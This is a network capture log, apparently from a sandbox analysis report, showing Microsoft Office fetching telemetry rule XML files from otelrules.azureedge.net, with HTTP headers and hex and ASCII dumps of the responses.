                                                        2024-11-12 15:27:16 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        111192.168.2.64983813.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:17 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:17 UTC517INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:17 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 1356
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Vary: Accept-Encoding
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                        ETag: "0x8DC582BDC681E17"
                                                        x-ms-request-id: 081c3a8e-a01e-0053-58d2-2c8603000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152717Z-16547b76f7fcjqqhhC1DFWrrrc0000000fq000000000m746
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:17 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        112192.168.2.64984013.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:17 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:17 UTC494INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:17 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 1356
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                        ETag: "0x8DC582BDF66E42D"
                                                        x-ms-request-id: f8aeeb5f-a01e-0032-4aa0-341949000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152717Z-15869dbbcc6vr5dxhC1DFWyw4g00000001z0000000005nrv
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:17 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        113192.168.2.64984213.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:17 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:17 UTC494INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:17 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 1358
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                        ETag: "0x8DC582BE6431446"
                                                        x-ms-request-id: 791f132d-601e-003e-49a7-343248000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152717Z-17df447cdb5zfhrmhC1DFWh3300000000c8g00000000006e
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:17 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        114192.168.2.64984113.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:17 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:17 UTC515INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:17 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 1395
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                        ETag: "0x8DC582BE017CAD3"
                                                        x-ms-request-id: b51813c1-401e-002a-5f12-32c62e000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152717Z-16547b76f7f67wxlhC1DFWah9w0000000ftg00000000c8vp
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache-Info: L1_T2
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:17 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        115192.168.2.64984313.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:17 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:17 UTC517INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:17 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 1395
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Vary: Accept-Encoding
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                        ETag: "0x8DC582BDE12A98D"
                                                        x-ms-request-id: 43524f19-601e-003e-07d2-2c3248000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152717Z-16547b76f7frbg6bhC1DFWr5400000000fs000000000an1u
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:17 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        116192.168.2.64984413.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:18 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:18 UTC538INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:18 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 1358
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Vary: Accept-Encoding
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                        ETag: "0x8DC582BE022ECC5"
                                                        x-ms-request-id: 70b2909d-801e-00ac-33c1-2cfd65000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152718Z-16547b76f7f22sh5hC1DFWyb4w0000000fn000000000pcmk
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache-Info: L1_T2
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:18 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        117192.168.2.64984513.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:18 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:18 UTC538INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:18 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 1389
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Vary: Accept-Encoding
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                        ETag: "0x8DC582BE10A6BC1"
                                                        x-ms-request-id: 8f98044c-301e-006e-14bd-2cf018000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152718Z-16547b76f7f7rtshhC1DFWrtqn0000000ftg00000000hb68
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache-Info: L1_T2
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:18 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        118192.168.2.64984713.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:18 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:18 UTC538INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:18 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 1405
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Vary: Accept-Encoding
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                        ETag: "0x8DC582BE12B5C71"
                                                        x-ms-request-id: 3018d77d-101e-008d-49d2-2c92e5000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152718Z-16547b76f7f9bs6dhC1DFWt3rg0000000fu000000000b25f
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache-Info: L1_T2
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:18 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        119192.168.2.64984613.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:18 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:18 UTC494INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:18 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 1352
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                        ETag: "0x8DC582BE9DEEE28"
                                                        x-ms-request-id: 4d49a3e8-001e-008d-0aa5-34d91e000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152718Z-15869dbbcc6kg5mvhC1DFW39vn000000069g000000007d8v
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:18 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        120192.168.2.64984813.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:18 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:18 UTC517INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:18 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 1368
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Vary: Accept-Encoding
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                        ETag: "0x8DC582BDDC22447"
                                                        x-ms-request-id: ddaecdfb-101e-0079-21d2-2c5913000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152718Z-16547b76f7fr4g8xhC1DFW9cqc0000000f30000000002rns
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:18 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        121192.168.2.64984940.115.3.253443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:18 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 39 75 75 34 6f 4b 2f 4d 66 30 61 55 2f 69 38 4d 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 63 61 62 32 38 66 66 61 65 34 65 32 37 31 65 0d 0a 0d 0a
                                                        Data Ascii: CNT 1 CON 305MS-CV: 9uu4oK/Mf0aU/i8M.1Context: ecab28ffae4e271e
